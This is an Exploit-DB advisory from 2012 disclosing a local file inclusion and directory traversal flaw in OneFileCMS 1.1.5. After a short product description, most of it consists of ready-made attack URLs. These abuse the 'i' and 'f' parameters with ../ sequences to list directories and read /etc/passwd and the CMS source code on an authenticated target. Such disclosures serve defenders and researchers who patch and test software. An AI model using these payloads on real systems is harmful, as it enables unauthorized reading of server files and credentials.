OneFileCMS 1.1.5 - Local File Inclusion

Author: mr.pr0n
type: webapps
platform: php
port: 
date_added: 2012-03-16  
date_updated: 2012-03-16  
verified: 1  
codes: OSVDB-80099  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-03-16-at-83101-am.png  
application_url: http://www.exploit-db.comrocktronica-OneFileCMS-4808a7d.zip  

raw file: 18607.txt  

# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
# Google Dork: --
# Date: 16/03/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Software Link: https://github.com/rocktronica/OneFileCMS
# Version: OneFileCMS v.1.1.5
# Tested on: Linux Fedora 14

===============
Description
===============
OneFileCMS is just that. It's a flat, light, one file CMS (Content
Management System) entirely contained in an easy-to-implement, highly
customizable, database-less PHP script. Coupling a utilitarian code editor
with all the basic necessities of an FTP application, OneFileCMS can
maintain a whole website completely in-browser without any external
programs.

=======================================================
[!] All vulnerabilities requires authentication. [!]
=======================================================


Directory Listing, using the "i" parameter:
http://TARGET/onefilecms/onefilecms.php?i=../../../../


Read local files, using the "f" parameter:
http://TARGET/onefilecms/onefilecms.php?f=../../../../etc/passwd
http://TARGET/onefilecms/onefilecms.php?f=../../../../var/www/html/onefilecms/onefilecms.php

--
http://ghostinthelab.wordpress.com